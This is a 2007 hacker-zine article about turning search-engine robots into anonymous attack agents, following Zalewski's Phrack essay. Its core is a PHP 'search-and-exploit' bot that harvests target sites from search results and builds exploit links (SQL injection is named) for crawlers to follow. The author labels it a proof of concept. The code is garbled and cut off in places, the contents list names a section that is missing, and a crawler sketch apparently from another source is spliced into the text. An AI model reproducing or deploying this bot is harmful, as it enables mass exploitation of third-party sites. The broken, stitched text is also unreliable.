Title: I, Bot. Taking advantage of robots power.
Re: "Against the System: Rise of the Robots" of Michal Zalewski
Author: Crossbower - crossbower#katamail.com
Site: http://www.playhack.net 
Date: 2007-04-18
---------------------------------------------------------------------------------
-[ SUMMARY ]---------------------------------------------------------------------
0x00: Intro, let's start
0x01: Abstract
0x02: Implementation
0x03: The code: Paranoid Android
0x04: Conclusion
---------------------------------------------------------------------------------
---[ 0x00: Intro, let's start ]
Hello everybody. I'm very sorry for my poor English, but it's not my
first language. I hope you will excuse any errors ;)
This paper is meant as a reply to an article published in Phrack by Michal Zalewski.
He was the first to suggest the possibility of taking advantage of the multitude of
robots that scan the web at every moment in search of information.
We begin with the introduction to Zalewski's article, then we will see how
to implement his ideas in order to write our own bots.
"Consider a remote exploit that is able to compromise a remote system
without sending any attack code to his victim. Consider an exploit
which simply creates local file to compromise thousands of computers,
and which does not involve any local resources in the attack. Welcome to
the world of zero-effort exploit techniques. Welcome to the world of
automation, welcome to the world of anonymous, dramatically difficult
to stop attacks resulting from increasing Internet complexity.
Zero-effort exploits create their 'wishlist', and leave it somewhere
in cyberspace - can be even its home host, in the place where others
can find it. Others - Internet workers (see references, [D]) - hundreds
of never sleeping, endlessly browsing information crawlers, intelligent
agents, search engines... They come to pick this information, and -
unknowingly - to attack victims. You can stop one of them, but can't
stop them all. You can find out what their orders are, but you can't
guess what these orders will be tomorrow, hidden somewhere in the abyss
of not yet explored cyberspace.
Your private army, close at hand, picking orders you left for them
on their way. You exploit them without having to compromise them. They
do what they are designed for, and they do their best to accomplish it.
Welcome to the new reality, where our A.I. machines can rise against us."
Now let's see how all this is possible in reality ;) Have fun!
-----------------------------------------------------------------------------[/]
---[ 0x01: Abstract ]
The idea that search engines (Google first of all) could be turned
into powerful weapons in the hands of attackers is not new.
Google hacking, search dorks, and cache digging are all techniques that
take advantage of a small part of what the engines know, but very few
people, until now, have thought of using their most sensitive and powerful part,
the robot... and this is the topic of this article.
A robot is a program that automatically traverses the Web's hypertext structure
by retrieving pages or documents, and recursively retrieving all documents that
are referenced.
Note that "recursive" here doesn't limit the definition to any specific traversal
algorithm. Even if a robot applies some heuristic to the selection and order of
documents to visit and spaces out requests over a long space of time, it is still
a robot.
Normal Web browsers aren't robots, because they are operated by a human, and
don't automatically retrieve referenced documents.
Web robots are sometimes referred to as Web Wanderers, Web Crawlers, or Spiders.
These names are a bit misleading because they give the impression the software itself
moves between sites like a virus. This is not the case: a robot simply visits sites
by requesting documents from them.
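To make the definition above concrete, here is a minimal sketch of such a
traversal in PHP, the language of the script later in this paper. It is only an
illustration and not part of the original article: the $web array, the
*.example URLs, the crawl() function and its $maxPages limit are all
hypothetical, and the "web" is a small in-memory map, so nothing is fetched over
the network. A breadth-first order is assumed here, but as noted, any traversal
order would still make it a robot.

```php
<?php
// Hypothetical in-memory "web": each URL maps to the URLs it references.
// A real robot would request each document over HTTP instead.
$web = [
    'http://a.example/'     => ['http://a.example/docs', 'http://b.example/'],
    'http://a.example/docs' => ['http://a.example/'],
    'http://b.example/'     => ['http://c.example/'],
    'http://c.example/'     => [],
];

/**
 * Breadth-first traversal: visit the start page, then every page it
 * references, and so on, never visiting the same URL twice.
 * $maxPages is an assumed safety limit on the number of visited pages.
 */
function crawl(array $web, string $start, int $maxPages = 100): array
{
    $visited = [];        // URLs already retrieved (used as a set)
    $queue   = [$start];  // URLs waiting to be retrieved

    while ($queue && count($visited) < $maxPages) {
        $url = array_shift($queue);
        if (isset($visited[$url])) {
            continue;     // already seen through another link
        }
        $visited[$url] = true;

        // Queue every referenced document that has not been visited yet.
        foreach ($web[$url] ?? [] as $link) {
            if (!isset($visited[$link])) {
                $queue[] = $link;
            }
        }
    }

    return array_keys($visited);
}

print_r(crawl($web, 'http://a.example/'));
```

Starting from http://a.example/, the sketch visits a.example/, a.example/docs,
b.example/ and c.example/ in that order; the link back from /docs to the start
page is skipped because it has already been retrieved.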
What kinds of robots are there? Robots can be used for a number of purposes:
* Indexing
* HTML validation
* Link validation
* "What's New" monitoring
* Mirroring
How many robots circulate on the web?
For a complete overview you can consult the list of active bots
(http://www.robotstxt.org/wc/active/html/type.html).
We will not go deeper, because that topic is outside the scope of this
article.
-----------------------------------------------------------------------------[/]
---[ 0x02: Implementation ]
What are the strong points of a bot?
Surely speed: the ability to execute a great number of operations in a
short time.
For exploitation we can write a bot with a mirroring-like function which,
using the information found in a database or in a search engine, can carry out
mass penetrations without scanning a great number of useless targets.
A first (and simple) implementation is this script. It queries a search
engine such as Google (or another one) and builds an array with the addresses
of sites that contain specific web pages. If enabled, it can automatically
exploit many types of vulnerabilities (for example SQL injection).
Although it is a simple script, it can become a destructive weapon if used in
the wrong way (ok noob?).
I therefore ask any lamer readers not to use it to cause damage. It's only
a Proof of Concept.
- - - - -
    code:  - - - - -
    #!/usr/bin/php
    
    echo "
           --- Google Finder ---
     Automatic SaE (search-and-exploit) Bot
      by Crossbower - Crossbower*katamail*com
    
    ";
    //Loading...
    error_reporting(0);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout",5);
    function SendPack($packet)
    {
      global $host, $port;
     
       $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) {
          echo 'No response from '.$host.':'.$port; die;
        }
       
      fputs($ock,$packet);
     
       $buffer='';
        while (!feof($ock)) {
          $buffer.=fgets($ock);
        }
     
      fclose($ock);
      return($buffer);
    }
    //START:
    /* Make and Send Query */
    $packet ="GET ".$SeInurl.$string.$SeNumber.$SeType." HTTP/1.0\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    $html=SendPack($packet);
    //Open log file
    $handle =fopen($LogFile,'a');
    //Initialize the log
    fwrite($handle,"\n# ".date("D dS M, Y h:i a :")."
\n");
    fwrite($handle,"Visited by:
\n");
    $Spider =$REMOTE_HOST."
".$REMOTE_ADDR."
";
    $Spider.=$HTTP_USER_AGENT."
".$HTTP_REFERER."
";
    $Spider.=$HTTP_ACCEPT_LANGUAGE."
\n";
    fwrite($handle,$Spider);
    fwrite($handle,"Links (google cache):
\n");
    $Log ="$Log.="http://".$host.$SeCache; 
    //Find targets
preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%&_/\?\=\~\-]+)#e',$html, $match); 
    for ($i=0; $i
\n";
       
       //Update log
       fwrite($handle,$Log.$match[1][$i].$exploit."\">".$match[1][$i].$exploit."
\n");
    }}
    //Close log
    fwrite($handle,"
\n");
    fclose($handle);
    ?>
    
    
    - - - - -
- - - - -
-----------------------------------------------------------------------------[/]
---[ 0x04: Conclusion ]
I hope this information has been of interest to you and has helped you
understand how serious robot-based attacks could become in the future...
To go deeper, you can read these documents:
- "Against the System: Rise of the Robots" by Michal Zalewski
http://www.phrack.org/archives/57/p57-0x13 
- "The Anatomy of a Large-Scale Hypertextual Web Search Engine"
Googlebot concept, Sergey Brin, Lawrence Page, Stanford University
http://www7.scu.edu.au/programme/fullpapers/1921/com1921.htm 
- Proprietary web solutions security, Michal Zalewski
http://lcamtuf.coredump.cx/milpap.txt 
- "A Standard for Robot Exclusion", Martijn Koster
http://info.webcrawler.com/mak/projects/robots/norobots.html 
- "The Web Robots Database"
http://www.robotstxt.org/wc/active.html 
http://www.robotstxt.org/wc/active/html/type.html 
- "Web Security FAQ", Lincoln D. Stein
http://www.w3.org/Security/Faq/www-security-faq.html 
Ok, that's all folks...
For clarifications, questions or anything else, don't hesitate to mail me ;)
Crossbower - crossbower#katamail.com
Site: http://www.playhack.net 
-----------------------------------------------------------------------------[/]